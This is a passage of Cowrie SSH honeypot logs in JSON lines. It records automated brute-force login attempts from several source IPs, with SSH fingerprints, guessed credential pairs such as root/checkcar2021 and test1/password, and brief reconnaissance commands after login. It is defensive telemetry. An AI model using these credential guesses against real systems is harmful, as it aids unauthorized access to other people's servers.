r","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:34:58.042150Z","src_ip":"212.227.235.229","session":"de53068f6208"}
{"eventid":"cowrie.login.failed","username":"test1","password":"password","message":"login attempt [test1/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:35:03.707222Z","src_ip":"212.227.235.229","session":"de53068f6208"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:35:05.594219Z","src_ip":"212.227.235.229","session":"de53068f6208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44782,"dst_ip":"1.2.3.4","dst_port":22,"session":"d087d0650aff","protocol":"ssh","message":"New connection: 212.227.125.160:44782 (1.2.3.4:22) [session: d087d0650aff]","sensor":"my-vps","timestamp":"2025-08-31T05:35:18.700204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:35:19.179223Z","src_ip":"212.227.125.160","session":"d087d0650aff"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:35:19.179942Z","src_ip":"212.227.125.160","session":"d087d0650aff"}
{"eventid":"cowrie.login.failed","username":"test1","password":"password","message":"login attempt [test1/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:35:21.316628Z","src_ip":"212.227.125.160","session":"d087d0650aff"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:35:22.964653Z","src_ip":"212.227.125.160","session":"d087d0650aff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51404,"dst_ip":"1.2.3.4","dst_port":22,"session":"be915c3e75b8","protocol":"ssh","message":"New connection: 212.227.125.160:51404 (1.2.3.4:22) [session: be915c3e75b8]","sensor":"my-vps","timestamp":"2025-08-31T05:35:38.807673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:35:42.396031Z","src_ip":"212.227.125.160","session":"be915c3e75b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:35:42.396981Z","src_ip":"212.227.125.160","session":"be915c3e75b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43896,"dst_ip":"1.2.3.4","dst_port":22,"session":"01fd742c7a8a","protocol":"ssh","message":"New connection: 212.227.125.160:43896 (1.2.3.4:22) [session: 01fd742c7a8a]","sensor":"my-vps","timestamp":"2025-08-31T05:35:43.925939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:35:45.008310Z","src_ip":"212.227.125.160","session":"01fd742c7a8a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:35:45.009251Z","src_ip":"212.227.125.160","session":"01fd742c7a8a"}
{"eventid":"cowrie.login.success","username":"root","password":"checkcar2021","message":"login attempt [root/checkcar2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:35:51.175766Z","src_ip":"212.227.125.160","session":"01fd742c7a8a"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:35:53.299221Z","src_ip":"212.227.125.160","session":"be915c3e75b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:35:53.838724Z","src_ip":"212.227.125.160","session":"01fd742c7a8a"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T05:35:53.839687Z","src_ip":"212.227.125.160","session":"01fd742c7a8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:35:54.900833Z","src_ip":"212.227.125.160","session":"01fd742c7a8a"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:35:54.902516Z","src_ip":"212.227.125.160","session":"01fd742c7a8a"}
{"eventid":"cowrie.session.closed","duration":"16.4","message":"Connection lost after 16.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:35:55.191613Z","src_ip":"212.227.125.160","session":"be915c3e75b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33070,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8641801f404","protocol":"ssh","message":"New connection: 212.227.235.229:33070 (1.2.3.4:22) [session: f8641801f404]","sensor":"my-vps","timestamp":"2025-08-31T05:35:55.699364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:35:56.467421Z","src_ip":"212.227.235.229","session":"f8641801f404"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:35:56.468184Z","src_ip":"212.227.235.229","session":"f8641801f404"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43544,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf538ee34bd1","protocol":"ssh","message":"New connection: 212.227.235.229:43544 (1.2.3.4:22) [session: bf538ee34bd1]","sensor":"my-vps","timestamp":"2025-08-31T05:35:59.764980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:36:00.991863Z","src_ip":"212.227.235.229","session":"bf538ee34bd1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:36:00.992533Z","src_ip":"212.227.235.229","session":"bf538ee34bd1"}
{"eventid":"cowrie.login.failed","username":"test1","password":"password1","message":"login attempt [test1/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:36:02.159750Z","src_ip":"212.227.235.229","session":"f8641801f404"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":37404,"dst_ip":"1.2.3.4","dst_port":22,"session":"48ee8f3dc984","protocol":"ssh","message":"New connection: 201.148.180.50:37404 (1.2.3.4:22) [session: 48ee8f3dc984]","sensor":"my-vps","timestamp":"2025-08-31T05:36:03.400690Z"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:03.953548Z","src_ip":"212.227.235.229","session":"f8641801f404"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:36:04.649657Z","src_ip":"201.148.180.50","session":"48ee8f3dc984"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:36:04.650355Z","src_ip":"201.148.180.50","session":"48ee8f3dc984"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":47492,"dst_ip":"1.2.3.4","dst_port":22,"session":"70801c9f3e22","protocol":"ssh","message":"New connection: 43.159.36.188:47492 (1.2.3.4:22) [session: 70801c9f3e22]","sensor":"my-vps","timestamp":"2025-08-31T05:36:06.348566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:36:06.349505Z","src_ip":"43.159.36.188","session":"70801c9f3e22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:36:06.593870Z","src_ip":"43.159.36.188","session":"70801c9f3e22"}
{"eventid":"cowrie.login.failed","username":"sl","password":"1234","message":"login attempt [sl/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:36:07.613621Z","src_ip":"43.159.36.188","session":"70801c9f3e22"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:08.861393Z","src_ip":"43.159.36.188","session":"70801c9f3e22"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":54554,"dst_ip":"1.2.3.4","dst_port":22,"session":"20cd19ca3a50","protocol":"ssh","message":"New connection: 170.64.166.123:54554 (1.2.3.4:22) [session: 20cd19ca3a50]","sensor":"my-vps","timestamp":"2025-08-31T05:36:09.003473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:36:09.004381Z","src_ip":"170.64.166.123","session":"20cd19ca3a50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:36:09.279154Z","src_ip":"170.64.166.123","session":"20cd19ca3a50"}
{"eventid":"cowrie.login.success","username":"root","password":"checkcar2021","message":"login attempt [root/checkcar2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:36:09.946529Z","src_ip":"201.148.180.50","session":"48ee8f3dc984"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:36:09.970432Z","src_ip":"212.227.235.229","session":"bf538ee34bd1"}
{"eventid":"cowrie.login.failed","username":"middleware","password":"admin123","message":"login attempt [middleware/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:36:10.420584Z","src_ip":"170.64.166.123","session":"20cd19ca3a50"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:11.696622Z","src_ip":"170.64.166.123","session":"20cd19ca3a50"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:36:12.884456Z","src_ip":"201.148.180.50","session":"48ee8f3dc984"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T05:36:12.885141Z","src_ip":"201.148.180.50","session":"48ee8f3dc984"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:14.449805Z","src_ip":"201.148.180.50","session":"48ee8f3dc984"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:14.450958Z","src_ip":"201.148.180.50","session":"48ee8f3dc984"}
{"eventid":"cowrie.session.closed","duration":"15.4","message":"Connection lost after 15.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:15.136167Z","src_ip":"212.227.235.229","session":"bf538ee34bd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51536,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bef48f2bf50","protocol":"ssh","message":"New connection: 212.227.125.160:51536 (1.2.3.4:22) [session: 1bef48f2bf50]","sensor":"my-vps","timestamp":"2025-08-31T05:36:17.278004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:36:17.746425Z","src_ip":"212.227.125.160","session":"1bef48f2bf50"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:36:17.747162Z","src_ip":"212.227.125.160","session":"1bef48f2bf50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49714,"dst_ip":"1.2.3.4","dst_port":22,"session":"c08fb43f744a","protocol":"ssh","message":"New connection: 212.227.125.160:49714 (1.2.3.4:22) [session: c08fb43f744a]","sensor":"my-vps","timestamp":"2025-08-31T05:36:17.797666Z"}
{"eventid":"cowrie.login.failed","username":"test1","password":"password1","message":"login attempt [test1/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:36:19.892982Z","src_ip":"212.227.125.160","session":"1bef48f2bf50"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:21.434253Z","src_ip":"212.227.125.160","session":"1bef48f2bf50"}
